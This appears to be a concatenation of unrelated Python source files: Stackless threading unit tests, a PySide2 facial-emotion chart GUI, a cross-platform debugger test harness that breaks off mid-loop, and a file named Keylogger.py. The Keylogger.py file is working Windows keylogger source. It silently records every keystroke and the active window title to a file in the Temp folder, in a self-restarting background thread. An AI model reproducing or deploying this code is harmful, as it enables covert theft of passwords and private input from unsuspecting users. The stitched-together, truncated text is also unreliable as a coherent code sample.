class RemoteTaskletTests(SkipMixin, StacklessTestCase):
ThreadClass = LingeringThread
def setUp(self):
super(RemoteTaskletTests, self).setUp()
self.taskletExecuted = False
self.event = threading.Event()
self.channel = stackless.channel()
def create_tasklet(self, action, *args, **kw):
self.tasklet = stackless.tasklet(action)(*args, **kw)
self.event.set()
def tasklet_action(self):
self.taskletExecuted = True
def create_thread_task(self, action=None):
if not action:
action = self.tasklet_action
theThread = self.ThreadClass(target=self.create_tasklet,
args=(action,))
theThread.start()
self.event.wait()
self.event.clear()
t = self.tasklet
return theThread, t
class TestRemove(RemoteTaskletTests):
def test_remove_balance(self):
""" Test that remove from the runqueue of a remote thread does not affect the
bookkeeping of the current thread.
"""
before = stackless.getruncount()
thread, task = self.create_thread_task()
try:
after = stackless.getruncount()
self.assertEqual(before, after)
task.remove()
after = stackless.getruncount()
# only the runnable count on the remote thread
# should change
self.assertEqual(before, after)
finally:
thread.join()
def test_insert_balance(self):
""" Test that insert into the runqueue of a remote thread does not affect the
bookkeeping of the current thread.
"""
thread, task = self.create_thread_task()
try:
task.remove()
before = stackless.getruncount()
task.insert()
after = stackless.getruncount()
# only the runnable count on the remote thread
# should change
self.assertEqual(before, after)
finally:
thread.join()
class DeadThreadTest(RemoteTaskletTests):
def test_tasklet_from_dead_thread(self):
theThread, t = self.create_thread_task()
self.assertTrue(t.alive)
theThread.join()
time.sleep(0.01) # give the thread a short time to clean up
# now the tasklet should have been killed.
self.assertFalse(t.alive)
def test_removed_tasklet_from_dead_thread(self):
theThread, t = self.create_thread_task()
self.assertTrue(t.scheduled)
t.remove()
self.assertFalse(t.scheduled)
theThread.join()
time.sleep(0.01) # give the thread a short time to clean up
# now the tasklet should have been killed.
self.assertFalse(t.alive)
def test_rebound_tasklet_from_dead_thread(self):
theThread, t = self.create_thread_task()
t.remove()
t.bind_thread()
theThread.join()
# now the tasklet should be alive
self.assertTrue(t.alive)
t.run()
self.assertTrue(self.taskletExecuted)
self.assertFalse(t.alive)
def test_bind_runnable(self):
theThread, t = self.create_thread_task()
self.assertRaisesRegex(RuntimeError, "runnable", t.bind_thread)
theThread.join()
def test_death(self):
"""test tasklets from dead threads"""
theThread, t = self.create_thread_task()
with theThread:
self.assertNotEqual(t.thread_id, -1)
self.assertEqual(t.thread_id, -1)
def test_rebind_from_dead(self):
"""test that rebinding a fresh tasklet from a dead thread works"""
theThread, t = self.create_thread_task()
with theThread:
self.assertNotEqual(t.thread_id, -1)
self.assertEqual(t.thread_id, -1)
t.bind_thread()
self.assertEqual(t.thread_id, stackless.getcurrent().thread_id)
@testcase_leaks_references("test catches TaskletExit and refuses to die in its own thread")
def test_rebind_from_dead_fail_cstate(self):
# A test for https://github.com/stackless-dev/stackless/issues/92
loop = True
def task():
while loop:
try:
stackless.main.switch()
except TaskletExit:
pass
def other_thread_main():
tlet.bind_thread()
tlet.run()
tlet = stackless.tasklet().bind(apply_not_stackless, (task,))
t = threading.Thread(target=other_thread_main, name="other thread")
t.start()
t.join()
time.sleep(0.1) # other_thread needs some time to be destroyed
self.assertEqual(tlet.thread_id, -1)
self.assertFalse(tlet.alive)
self.assertFalse(tlet.restorable)
self.assertGreater(tlet.nesting_level, 0)
loop = False
try:
self.assertRaisesRegex(RuntimeError, "tasklet has C state on its stack", tlet.bind_thread)
except AssertionError:
tlet.kill() # causes an assertion error in debug builds of 2.7.9-slp
raise
# the tasklet has no thread
self.assertEqual(tlet.thread_id, -1)
self.tasklet_is_uncollectable(tlet)
def test_methods_on_dead(self):
"""test that tasklet methods on a dead tasklet behave well"""
class MyException(Exception):
pass
theThread, t = self.create_thread_task()
with theThread:
self.assertNotEqual(t.thread_id, -1)
self.assertEqual(t.thread_id, -1)
self.assertFalse(t.alive)
self.assertFalse(t.paused)
self.assertFalse(t.blocked)
self.assertFalse(t.scheduled)
self.assertTrue(t.restorable)
self.assertFalse(t.atomic)
self.assertFalse(t.block_trap)
self.assertFalse(t.ignore_nesting)
self.assertIsNone(t.next)
self.assertIsNone(t.prev)
# must not raise an exception
t.trace_function
t.profile_function
self.assertEqual(t.thread_id, -1)
t.bind(None)
self.assertEqual(t.thread_id, -1)
t.remove()
self.assertEqual(t.thread_id, -1)
t.bind(lambda: None)
self.assertEqual(t.thread_id, -1)
self.assertRaises(RuntimeError, t.setup)
self.assertEqual(t.thread_id, -1)
self.assertRaises(RuntimeError, t.bind, lambda: None, ())
self.assertEqual(t.thread_id, -1)
self.assertRaises(RuntimeError, t.insert)
self.assertEqual(t.thread_id, -1)
self.assertRaises(RuntimeError, t.run)
self.assertEqual(t.thread_id, -1)
self.assertRaises(RuntimeError, t.switch)
self.assertEqual(t.thread_id, -1)
self.assertRaises(RuntimeError, t.raise_exception, MyException, 'test')
self.assertEqual(t.thread_id, -1)
self.assertRaises(RuntimeError, t.throw, MyException)
self.assertEqual(t.thread_id, -1)
t.__reduce__()
self.assertEqual(t.thread_id, -1)
t.set_atomic(t.set_atomic(True))
self.assertEqual(t.thread_id, -1)
t.set_ignore_nesting(t.set_ignore_nesting(1))
self.assertEqual(t.thread_id, -1)
t.bind(None)
self.assertEqual(t.thread_id, -1)
class BindThreadTest(RemoteTaskletTests):
"""More unittests for tasklet.bind_thread"""
def testForeignThread_scheduled(self):
theThread, t = self.create_thread_task()
try:
self.assertEqual(t.thread_id, theThread.ident)
self.assertTrue(t.alive)
self.assertFalse(t.paused)
t.remove()
self.assertTrue(t.paused)
t.bind_thread()
self.assertTrue(t.alive)
self.assertTrue(t.paused)
self.assertNotEqual(t.thread_id, theThread.ident)
self.assertEqual(t.thread_id, thread.get_ident())
t.insert()
self.assertFalse(t.paused)
stackless.run()
self.assertTrue(self.taskletExecuted)
self.assertFalse(t.alive)
finally:
theThread.join()
def test_bind_to_current_tid(self):
current_id = stackless.getcurrent().thread_id
self.assertEqual(current_id, thread.get_ident())
theThread, t = self.create_thread_task()
t.remove()
with theThread:
self.assertEqual(t.thread_id, theThread.ident)
t.bind_thread(current_id)
self.assertEqual(t.thread_id, current_id)
t.run()
self.assertTrue(self.taskletExecuted)
self.assertFalse(t.alive)
def test_bind_to_bogus_tid(self):
current_id = stackless.getcurrent().thread_id
self.assertEqual(current_id, thread.get_ident())
theThread, t = self.create_thread_task()
t.remove()
with theThread:
self.assertEqual(t.thread_id, theThread.ident)
self.assertRaises(OverflowError, t.bind_thread, -2)
# try the max long value, it is very likely not a valid id
self.assertRaises(ValueError, t.bind_thread,
((1 << (struct.calcsize('@L')*8-1))-1))
t.bind_thread(current_id)
self.assertEqual(t.thread_id, current_id)
t.run()
self.assertTrue(self.taskletExecuted)
self.assertFalse(t.alive)
class SchedulingBindThreadTests(RemoteTaskletTests):
ThreadClass = SchedulingThread
def tasklet_action(self):
self.channel.receive()
self.taskletExecuted = True
self.channel.send(None)
def test_bind_to_other_tid(self):
self.skipUnlessSoftswitching()
current_id = stackless.getcurrent().thread_id
self.assertEqual(current_id, thread.get_ident())
theThread, t = self.create_thread_task()
with theThread:
otherThread, t2 = self.create_thread_task()
with otherThread:
self.assertEqual(t.thread_id, theThread.ident)
t.bind_thread(otherThread.ident)
self.assertEqual(t.thread_id, otherThread.ident)
self.channel.send(None)
self.channel.receive()
self.assertTrue(self.taskletExecuted)
self.assertFalse(t.alive)
def tasklet_runnable_action(self):
"""A tasklet that keeps itself runnable"""
while not self.channel.balance:
stackless.schedule()
time.sleep(0.001)
self.channel.receive()
def test_rebind_runnable(self):
theThread, t = self.create_thread_task(self.tasklet_runnable_action)
with theThread:
self.assertRaisesRegex(RuntimeError, 'runnable', t.bind_thread)
self.channel.send(None)
class SwitchTest(RemoteTaskletTests):
ThreadClass = SchedulingThread
def tasklet_action(self):
stackless.schedule_remove() # pause it
self.taskletExecuted = True
def test_switch(self):
"""Test that inter-thread switching fails"""
theThread, t = self.create_thread_task()
with theThread:
time.sleep(0.01)
self.assertTrue(t.paused)
self.assertRaisesRegex(RuntimeError, "different thread", t.switch)
class SetupFromDifferentThreadTest(RemoteTaskletTests):
# Test case for issue #60 https://github.com/stackless-dev/stackless/issue/60
def create_tasklet(self, action, *args, **kw):
self.tasklet = stackless.tasklet(action)
self.event.set()
def test_setup_from_other_thread(self):
theThread, t = self.create_thread_task()
t.setup()
theThread.join()
@unittest.skipUnless(withThreads, "requires thread support")
class TestThreadLocalStorage(StacklessTestCase):
class ObjectWithDestructor(object):
def __init__(self, event):
self.event = event
def __del__(self):
self.event.set()
def test_destructor_at_end_of_thread(self):
# Test case for issue #121 https://github.com/stackless-dev/stackless/issue/121
# Run a destructor during clean up of thread local storage
# Until issue #121 got fixed, this caused a reference leak
tls = threading.local()
deleted = threading.Event()
def other_thread():
tls.owd = self.ObjectWithDestructor(deleted)
self.assertFalse(deleted.is_set())
t = threading.Thread(target=other_thread, name="other thread")
t.start()
t.join()
time.sleep(0.1) # give the thread time to clean up
self.assertTrue(deleted.is_set())
if __name__ == '__main__':
if not sys.argv[1:]:
sys.argv.append('-v')
unittest.main()
|
Keylogger.py
|
# Import modules
import os
import win32gui
try:
from threading import Thread
from pynput.keyboard import Key, Listener
except ImportError:
raise SystemExit('Please run › pip install pynput')
# Define variables for keylogger
Count = 0
Keys = []
WindowsTitle = ''
# Detected Button Definition
def Keyboard(Key):
global Count, Keys
Keys.append(Key)
Count += 1
if Count >= 1:
WriteFile(Keys)
Keys = []
Count = 0
# Writing pressed buttons to a file
def WriteFile(Key):
with open(os.getenv('Temp') + '\\Keylogs.txt', 'a', encoding='utf-8') as f:
global WindowsTitle
if WindowsTitle != win32gui.GetWindowText(win32gui.GetForegroundWindow()):
f.write(('\n\n' + win32gui.GetWindowText(win32gui.GetForegroundWindow()) + '\n'))
if str(Key).find('space') >= 0:
f.write(' ')
elif str(Key).find('Key') == -1:
Key = str(Key[0]).replace("'", '')
try:
f.write(Key)
except:
pass
WindowsTitle = win32gui.GetWindowText(win32gui.GetForegroundWindow())
# Listener function
def Threader():
while True:
try:
with Listener(on_press=Keyboard) as listener:
listener.join()
except:
pass
# Activates the keylogger thread
Thread(target=Threader).start()
|
run_model_improved.py
|
import sys
import threading as threading
from multiprocessing import Process, Queue
import numpy as numpy
import PySide2.QtCharts
from os.path import basename
from PySide2.QtCore import QPoint, Qt, QRect, QTimer
from PySide2.QtWidgets import QAction, QMainWindow, QApplication, QPushButton, QMenu, QFileDialog
from PySide2.QtGui import QPixmap, QImage, QPainter, QPen
from PySide2.QtCharts import QtCharts
import pyside2_faceReader_draw_image
from pyside2_faceReader_box_movable import Grabber
from pyside2_faceReader_model import FaceReader
from random import random
## Move to different file?
def model_worker(inputs_queue, outputs_queue,x,y,w,h):
while True:
if not inputs_queue.empty():
print(f'Receiving message')
message = inputs_queue.get()
print(f'message:', message)
if message == 'STOP':
print(f'stopping')
break
elif message == "start":
model = FaceReader(outputs_queue)
count = 0
x1 = x
y1 = y
width = w
height = h
while True:
# Use multiple queues, the input message queues get consumed before the model starts so we don't process pre-start button
# changes to the location
if not inputs_queue.empty():
message = inputs_queue.get()
print(f'message:', message)
if "UPDATE" in message:
new_cords = message.split(" ")
x1 = int(new_cords[1])
y1 = int(new_cords[2])
width = x1+int(new_cords[3])
height = y1+int(new_cords[4])
elif message == 'STOP':
print(f'stopping')
break
else:
continue
else:
# take image here, then input that into the functions
model.run(x1, y1, width, height, count)
count += 1
if count > 200:
count = 0
class Menu(QMainWindow):
default_title = "ReLuu FaceReader"
face_box = None
face_reader = None
def __init__(self, numpy_image=None, start_position=(200, 300, 550, 500)):
super().__init__()
self.box_x = None
self.box_y = None
self.box_w = None
self.box_h = None
self.model_running = False
self.box_drawn_can_start = False
self.face_anger_digust = 0
self.face_happy = 0
self.face_neutral = 0
self.face_sadness = 0
self.face_surprise_fear = 0
self.face_lock = threading.Lock()
self.face_confidence_level = numpy.zeros((1,5))
self.face_confidence_entry_count = 0
self.emotion_set = None
self.create_graph()
self._timer = QTimer()
self._timer.setInterval(33)
self._timer.timeout.connect(self.calculate_emotion)
self._timer.start()
self._graph_timer = None
self.face_model_process = None
self.inputs_queue = Queue()
self.outputs_queue = Queue()
#Seems clunky, idk
self.update_position_queue = Queue(1)
self.update_position_lock = threading.Lock()
self._graph_timer = QTimer()
self._graph_timer.setInterval(2000)
self._graph_timer.timeout.connect(self.create_graph)
# self.delete_timer = QTimer()
# self.delete_timer.setInterval(1500)
# self.delete_timer.timeout.connect(self.print_cords_forme)
# self.delete_timer.start()
# self.delete_timer2 = QTimer()
# self.delete_timer2.setInterval(33)
# self.delete_timer2.timeout.connect(self.update_position_model_not_running)
# self.delete_timer2.start()
# New snip
new_snip_action = QAction("Draw Box", self)
new_snip_action.triggered.connect(self.__new_image_window)
close_box = QAction('Close Box', self)
close_box.triggered.connect(self.__close_box)
run_program = QAction('start program', self)
run_program.triggered.connect(self.__start_program)
stop_program = QAction('stop program', self)
stop_program.triggered.connect(self.__stop_program)
self.toolbar = self.addToolBar('Exit')
self.toolbar.addAction(new_snip_action)
self.toolbar.addAction(close_box)
self.toolbar.addAction(run_program)
self.toolbar.addAction(stop_program)
self.snippingTool = pyside2_faceReader_draw_image.SnippingWidget(self)
self.setGeometry(*start_position)
self.show()
def create_graph(self):
self.face_lock.acquire()
self.emotion_set = QtCharts.QBarSet('Confidence Level')
new_graph_value = self.face_confidence_level / self.face_confidence_entry_count
print(f"----- New graph value{str(new_graph_value)}--------------")
self.face_anger_digust = new_graph_value[0][0]
self.face_happy = new_graph_value[0][1]
self.face_neutral = new_graph_value[0][2]
self.face_sadness = new_graph_value[0][3]
self.face_surprise_fear = new_graph_value[0][4]
self.emotion_set.append([self.face_anger_digust, self.face_happy, self.face_neutral, self.face_sadness, self.face_surprise_fear])
series = QtCharts.QHorizontalBarSeries()
series.append(self.emotion_set)
self.face_confidence_level = numpy.zeros((1,5))
self.face_confidence_entry_count = 0
self.face_lock.release()
chart = QtCharts.QChart()
chart.addSeries(series)
chart.setTitle('ReLuu FaceReader')
# chart.setAnimationOptions(QtCharts.SeriesAnimations)
emotions = ('Angery and Disgusted', 'Happy', 'Neutral', 'Sadness', 'Fear and Surprise')
axisY = QtCharts.QBarCategoryAxis()
axisY.append(emotions)
chart.addAxis(axisY, Qt.AlignLeft)
series.attachAxis(axisY)
axisX = QtCharts.QValueAxis()
axisX.setMax(1.0)
chart.addAxis(axisX, Qt.AlignBottom)
series.attachAxis(axisX)
axisX.applyNiceNumbers()
chart.legend().setVisible(True)
chart.legend().setAlignment(Qt.AlignBottom)
chartView = QtCharts.QChartView(chart)
chartView.setRenderHint(QPainter.Antialiasing)
self.setCentralWidget(chartView)
def __new_image_window(self):
self.snippingTool.start()
def __create_box(self, x,y,w,h):
width = w-x
height = h-y
Menu.face_box = Grabber(x,y,width,height, self.inputs_queue, self.update_position_queue, self.update_position_lock)
self.box_x = x
self.box_y = y
self.box_w = w
self.box_h = h
self.box_drawn_can_start = True
def __start_program(self):
if self.box_drawn_can_start and not self.model_running:
self.update_position_lock.acquire()
self._graph_timer.start()
# if not self.update_position_queue.empty():
# message = self.update_position_queue.get()
# new_cords = message.split(" ")
# self.box_x = int(new_cords[1])
# self.box_y = int(new_cords[2])
# self.box_w = self.box_x+int(new_cords[3])
# self.box_h = self.box_y+int(new_cords[4])
# self.update_position_queue.put(message)
self.face_model_process = Process(target=model_worker, args=(self.inputs_queue, self.outputs_queue, self.box_x, self.box_y, self.box_w, self.box_h))
self.face_model_process.start()
self.model_running = True
self.inputs_queue.put("start")
self.update_position_lock.release()
elif not self.box_drawn_can_start:
print("---Cannot start program, box not drawn---")
else:
print("---model running___")
# Only used when the model is not running
# def update_position_model_not_running(self):
# if not global_model_start:
# if not self.inputs_queue.empty():
# message = self.inputs_queue.get()
# print(f'message:', message)
# if "UPDATE" in message:
# new_cords = message.split(" ")
# self.box_x = int(new_cords[1])
# self.box_y = int(new_cords[2])
# self.box_w = self.box_x+int(new_cords[3])
# self.box_h = self.box_y+int(new_cords[4])
# def print_cords_forme(self):
# if not global_model_start:
# print("printing cords")
# print(self.box_x, self.box_y, self.box_w, self.box_h)
def calculate_emotion(self):
if not self.outputs_queue.empty():
self.face_lock.acquire()
self.face_confidence_entry_count +=1
face_confidence_output = self.outputs_queue.get()
self.face_confidence_level += face_confidence_output
print("-------emotion calculated-------")
self.face_lock.release()
def __stop_program(self):
if self.face_model_process is not None:
self.face_model_process.terminate()
self._graph_timer.stop()
self.model_running = False
print("---closing model---")
def __close_box(self):
if Menu.face_box:
self.__stop_program()
Menu.face_box.close_window()
self.box_drawn_can_start = False
print("---closing box---")
def __graph(self):
self.face_lock.acquire()
print("updating graph...")
r1 = random()
r2 = random()
r3 = random()
r4 = random()
r5 = random()
self.face_anger_digust = r1
self.face_happy = r2
self.face_neutral = r3
self.face_sadness = r4
self.face_surprise_fear = r5
self.emotion_set.append([self.face_anger_digust, self.face_happy, self.face_neutral, self.face_sadness, self.face_surprise_fear])
# self.face_confidence_level = numpy.zeros((1,5))
# self.face_confidence_entry_count = 0
# new_graph_value = self.face_confidence_level / self.face_confidence_entry_count
# print(str(new_graph_value))
# self.face_anger_digust = new_graph_value[0][0]
# self.face_happy = new_graph_value[0][1]
# self.face_neutral = new_graph_value[0][2]
# self.face_sadness = new_graph_value[0][3]
# self.face_surprise_fear = new_graph_value[0][4]
# self.emotion_set.append([self.face_anger_digust, self.face_happy, self.face_neutral, self.face_sadness, self.face_surprise_fear])
# self.face_confidence_level = numpy.zeros((1,5))
# self.face_confidence_entry_count = 0
self.face_lock.release()
def mousePressEvent(self, event):
if event.button() == Qt.LeftButton:
self.drawing = True
self.lastPoint = event.pos() - QPoint(0, self.toolbar.height())
def mouseMoveEvent(self, event):
if event.buttons() and Qt.LeftButton and self.drawing:
painter = QPainter(self.image)
painter.setPen(QPen(self.brushColor, self.brushSize, Qt.SolidLine, Qt.RoundCap, Qt.RoundJoin))
painter.drawLine(self.lastPoint, event.pos() - QPoint(0, self.toolbar.height()))
self.lastPoint = event.pos() - QPoint(0, self.toolbar.height())
self.update()
def mouseReleaseEvent2(self, event):
if event.button == Qt.LeftButton:
self.drawing = False
def closeEvent(self, event):
Menu.face_box.close()
event.accept()
if __name__ == '__main__':
app = QApplication(sys.argv)
mainMenu = Menu()
sys.exit(app.exec_())
|
test.py
|
#!/usr/bin/env python3
#
# unit tests for debugger
import os
import re
import sys
import time
import platform
import threading
import traceback
import subprocess
from struct import unpack
import colorama
sys.path.append('..')
import debugger.lldb as lldb
import debugger.dbgeng as dbgeng
import debugger.DebugAdapter as DebugAdapter
import debugger.gdb as gdb
import debugger.utils as utils
# globals
adapter = None
testbin = None
#--------------------------------------------------------------------------
# UTILITIES
#--------------------------------------------------------------------------
def shellout(cmd):
process = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
(stdout, stderr) = process.communicate()
stdout = stdout.decode("utf-8")
stderr = stderr.decode("utf-8")
#print('stdout: -%s-' % stdout)
#print('stderr: -%s-' % stderr)
process.wait()
return (stdout, stderr)
def parse_image(fpath):
load_addr = None
entry_offs = None
print('finding entrypoint for %s' % fpath)
with open(fpath, 'rb') as fp:
data = fp.read()
# little endian macho
if data[0:4] == b'\xCF\xFA\xED\xFE':
assert_equality(data[4:8], b'\x07\x00\x00\x01') # CPU_TYPE_X86_X64
ncmds = unpack('<I', data[16:20])[0]
#print('ncmds: %d' % ncmds)
vmaddr = None
entryoff1 = None # offset given by COMMAND entry_point_command (priority)
entryoff2 = None # offset of __text section inside __TEXT segment
offs = 0x20
for i in range(ncmds):
cmd = unpack('<I', data[offs:offs+4])[0]
cmdsize = unpack('<I', data[offs+4:offs+8])[0]
if cmd == 0x19: # segment_command_64
if data[offs+8:offs+16] == b'\x5F\x5F\x54\x45\x58\x54\x00\x00': # __TEXT
vmaddr = unpack('<Q', data[offs+24:offs+32])[0]
print('vmaddr: %X' % vmaddr)
nsects = unpack('<I', data[offs+64:offs+68])[0]
#print('segment __TEXT nsects: %d' % nsects)
# advance past command to first section
o_scn = offs + 0x48
for i in range(nsects):
name = data[o_scn+0:o_scn+16]
#print('__TEXT section %d: %s' % (i, name))
if name == b'__text\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00':
entryoff2 = unpack('<I', data[o_scn+0x30:o_scn+0x34])[0]
break;
o_scn += 0x50
if entryoff2 == None:
raise Exception('couldn\'t locate section __text in segment __TEXT in %s' % fpath)
if cmd == 0x80000028: # entry_point_command
entryoff = unpack('<I', data[offs+8:offs+12])[0]
#print('entryoff: %X' % entryoff)
offs += cmdsize
if not vmaddr:
raise Exception('couldn\'t locate segment_command_64 (where __TEXT loads) in %s' % fpath)
if entryoff1 == None and entryoff2 == None:
raise Exception('couldn\'t locate entry_point_command in macho (where main is)' % fpath)
load_addr = vmaddr
entry_offs = entryoff1 or entryoff2
# PE
elif data[0:2] == b'\x4d\x5a':
e_lfanew = unpack('<I', data[0x3C:0x40])[0]
if data[e_lfanew:e_lfanew+6] == b'\x50\x45\x00\x00\x64\x86':
# x86_64
entryoff = unpack('<I', data[e_lfanew+0x28:e_lfanew+0x2C])[0]
vmaddr = unpack('<Q', data[e_lfanew+0x30:e_lfanew+0x38])[0]
elif data[e_lfanew:e_lfanew+6] == b'\x50\x45\x00\x00\x4c\x01':
# x86
entryoff = unpack('<I', data[e_lfanew+0x28:e_lfanew+0x2C])[0]
vmaddr = unpack('<I', data[e_lfanew+0x34:e_lfanew+0x38])[0]
load_addr = vmaddr
entry_offs = entryoff
# ELF
elif data[0:4] == b'\x7FELF':
if data[4] == 1: # EI_CLASS 32-bit
assert_equality(data[5], 1) # EI_DATA little endian
assert data[0x10:0x12] in [b'\x02\x00', b'\x03\x00'] # e_type ET_EXEC or ET_DYN (pie)
#assert_equality(data[0x12:0x14], b'\x3E\x00' # e_machine EM_X86_64)
e_entry = unpack('<I', data[0x18:0x1C])[0]
e_phoff = unpack('<I', data[0x1C:0x20])[0]
e_phentsize = unpack('<H', data[0x2A:0x2C])[0]
e_phnum = unpack('<H', data[0x2C:0x2E])[0]
print('e_entry:0x%X e_phoff:0x%X e_phentsize:0x%X e_phnum:0x%X' %
(e_entry, e_phoff, e_phentsize, e_phnum))
# find first PT_LOAD
p_vaddr = None
offs = e_phoff
for i in range(e_phnum):
p_type = unpack('<I', data[offs:offs+4])[0]
#print('at offset 0x%X p_type:0x%X' % (offs, p_type))
if p_type == 1:
p_vaddr = unpack('<I', data[offs+8:offs+12])[0]
break
offs += e_phentsize
if p_vaddr == None:
raise Exception('couldnt locate a single PT_LOAD program header')
load_addr = p_vaddr
entry_offs = e_entry - p_vaddr
elif data[4] == 2: # EI_CLASS 64-bit
assert_equality(data[5], 1) # EI_DATA little endian
assert data[0x10:0x12] in [b'\x02\x00', b'\x03\x00'] # e_type ET_EXEC or ET_DYN (pie)
#assert_equality(data[0x12:0x14], b'\x3E\x00' # e_machine EM_X86_64)
e_entry = unpack('<Q', data[0x18:0x20])[0]
e_phoff = unpack('<Q', data[0x20:0x28])[0]
e_phentsize = unpack('<H', data[0x36:0x38])[0]
e_phnum = unpack('<H', data[0x38:0x3a])[0]
print('e_entry:0x%X e_phoff:0x%X e_phentsize:0x%X e_phnum:0x%X' %
(e_entry, e_phoff, e_phentsize, e_phnum))
# find first PT_LOAD
p_vaddr = None
offs = e_phoff
for i in range(e_phnum):
p_type = unpack('<I', data[offs:offs+4])[0]
#print('at offset 0x%X p_type:0x%X' % (offs, p_type))
if p_type == 1:
p_vaddr = unpack('<Q', data[offs+16:offs+24])[0]
break
offs += e_phentsize
if p_vaddr == None:
raise Exception('couldnt locate a single PT_LOAD program header')
load_addr = p_vaddr
entry_offs = e_entry - p_vaddr
else:
raise Exception('expected e_ident[EI_CLASS] to be 1 or 2, got: %d' % data[4])
else:
raise Exception('unrecognized file type')
print('(file) load addr: 0x%X' % load_addr)
print('(file) entry offset: 0x%X' % entry_offs)
return (load_addr, entry_offs)
# 'helloworld' -> '.\testbins\helloworld.exe' (windows)
# 'helloworld' -> './testbins/helloworld' (linux, android)
def testbin_to_fpath():
global testbin
if testbin.endswith('-win') or testbin.endswith('-windows'):
testbin = testbin + '.exe'
tmp = os.path.join('testbins', testbin)
if '~' in tmp:
tmp = os.expanduser(tmp)
tmp = os.path.abspath(tmp)
return tmp
# 'helloworld_armv7-android' -> '/data/local/tmp/helloworld_armv7-android'
def testbin_to_mpath():
global testbin
m = re.match(r'^.*_(.*)-(.*)$', testbin)
(mach, os_) = m.group(1, 2)
if os_ == 'android':
return '/data/local/tmp/' + testbin
else:
return testbin_to_fpath()
def break_into(adapter):
print('sending break')
adapter.break_into()
def invoke_adb_gdb_listen(testbin_args, port=31337):
global testbin
if '_armv7-' in testbin: gdbserver = 'gdbserver_armv7'
elif '_aarch64-' in testbin: gdbserver = 'gdbserver_aarch64'
else: raise Exception('cannot determine gdbserver architecture from %s' % testbin)
cmdline = []
cmdline.append('adb')
cmdline.append('shell')
cmdline.append('/data/local/tmp/%s :%d /data/local/tmp/%s' % (gdbserver, port, testbin))
cmdline.extend(testbin_args)
print('invoke_adb() executing: %s' % ' '.join(cmdline))
shellout(cmdline)
print('invoke_adb() done')
def is_wow64():
global testbin
if not 'x86' in testbin: return False
(a,b) = platform.architecture()
return a=='64bit' and b.startswith('Windows')
def go_initial(adapter):
global testbin
if is_wow64():
(reason, info) = adapter.go()
assert_equality((reason, info), (DebugAdapter.STOP_REASON.UNKNOWN, 0x4000001f))
return adapter.go()
def assert_equality(a, b):
if a == b: return
utils.red('EXPECTED EQUALITY!')
utils.red(' actual: %s' % a)
utils.red('expected: %s' % b)
traceback.print_stack()
sys.exit(-1)
# let there be a single check for single-step
# (abstract away OS-exceptional cases)
def expect_single_step(reason):
global testbin
if 'macos' in testbin:
expected = DebugAdapter.STOP_REASON.BREAKPOINT
else:
expected = DebugAdapter.STOP_REASON.SINGLE_STEP
assert_equality(reason, expected)
def expect_bad_instruction(reason):
global testbin
# :/ I cannot induce a bad instruction exception on these OS's!
if 'macos' in testbin or 'windows' in testbin or 'android' in testbin:
expected = DebugAdapter.STOP_REASON.ACCESS_VIOLATION
else:
expected = DebugAdapter.STOP_REASON.ILLEGAL_INSTRUCTION
assert_equality(reason, expected)
def assert_general_error(func):
raised = False
try:
func()
except DebugAdapter.GeneralError:
raised = True
assert raised
# determines the entrypoint from the
def confirm_initial_module(adapter):
global testbin
fpath = testbin_to_fpath()
mpath = testbin_to_mpath()
module2addr = adapter.mem_modules()
#print('module2addr: ', ' '.join(['%s:%X' % (i[0],i[1]) for i in module2addr.items()]))
#print(' mpath: ', mpath)
if not mpath in module2addr:
mpath = os.path.basename(mpath)
assert mpath in module2addr
(load_addr, entry_offs) = parse_image(fpath)
print(' load_addr: 0x%X' % load_addr)
if '_pie' in testbin:
# pie: override file's load address with runtime load address
load_addr = module2addr[mpath]
else:
# non-pie: file's load address should match runtime load address
assert_equality(module2addr[mpath], load_addr)
return load_addr + entry_offs
def android_test_setup(testbin_args=[]):
global testbin
# send file to phone
fpath = testbin_to_fpath()
shellout(['adb', 'push', fpath, '/data/local/tmp'])
# launch adb
threading.Thread(target=invoke_adb_gdb_listen, args=[testbin_args]).start()
# connect to adb
time.sleep(.25)
adapter = gdb.DebugAdapterGdb()
adapter.connect('localhost', 31337)
entry = confirm_initial_module(adapter)
return (adapter, entry)
#------------------------------------------------------------------------------
# MAIN
#------------------------------------------------------------------------------
if __name__ == '__main__':
colorama.init()
arg = sys.argv[1] if sys.argv[1:] else None
# one-off tests
if arg == 'oneoff':
fpath = testbin_to_fpath('helloworld_thread')
adapter = DebugAdapter.get_adapter_for_current_system()
adapter.exec(fpath)
print(adapter.mem_modules())
print(type(adapter) == dbgeng.DebugAdapterDbgeng)
sys.exit(0)
# otherwise test all executables built in the testbins dir
testbins = []
for fname in os.listdir('testbins'):
fpath = os.path.join('testbins', fname)
if platform.system() == 'Windows':
if fpath.endswith('.exe'):
testbins.append(fname)
elif os.access(fpath, os.X_OK):
testbins.append(fname)
print('collected the following tests:\n', testbins)
#--------------------------------------------------------------------------
# x86/x64 TESTS
#--------------------------------------------------------------------------
# repeat adapter use tests
for tb in filter(lambda x: x.startswith('helloworld_x64'), testbins):
testbin = tb
fpath = testbin_to_fpath()
def thread_task():
adapter = DebugAdapter.get_adapter_for_current_system()
adapter.exec(fpath, ['segfault'])
# set initial breakpoint
entry = confirm_initial_module(adapter)
adapter.breakpoint_set(entry)
# go to breakpoint
(reason, extra) = go_initial(adapter)
assert_equality(reason, DebugAdapter.STOP_REASON.BREAKPOINT)
# clear, single step a few times
adapter.breakpoint_clear(entry)
(reason, extra) = adapter.step_into()
expect_single_step(reason)
(reason, extra) = adapter.step_into()
expect_single_step(reason)
(reason, extra) = adapter.step_into()
expect_single_step(reason)
# go until executing done
(reason, extra) = adapter.go()
assert_equality(reason, DebugAdapter.STOP_REASON.PROCESS_EXITED)
adapter.quit()
adapter = None
for i in range(10):
utils.green('testing %s %d/10' % (fpath, i+1))
t = threading.Thread(target=thread_task)
t.start()
t.join()
# return code tests
for tb in [x for x in testbins if x.startswith('exitcode')]:
testbin = tb
fpath = testbin_to_fpath()
# some systems return byte, or low byte of 32-bit code and otheres return 32-bit code
testvals = [('-11',[245,4294967285]), ('-1',[4294967295,255]), ('-3',[4294967293,253]), ('0',[0]), ('3',[3]), ('7',[7]), ('123',[123])]
for (arg, expected) in testvals:
adapter = DebugAdapter.get_adapter_for_current_system()
utils.green('testing %s %s' % (tb, arg))
adapter.exec(fpath, [arg])
(reason, extra) = go_initial(adapter)
assert_equality(reason, DebugAdapter.STOP_REASON.PROCESS_EXITED)
if not extra in expected:
raise Exception('expected return code %d to be in %s' % (extra, expected))
# exception test
for tb in testbins:
if not tb.startswith('do_exception'): continue
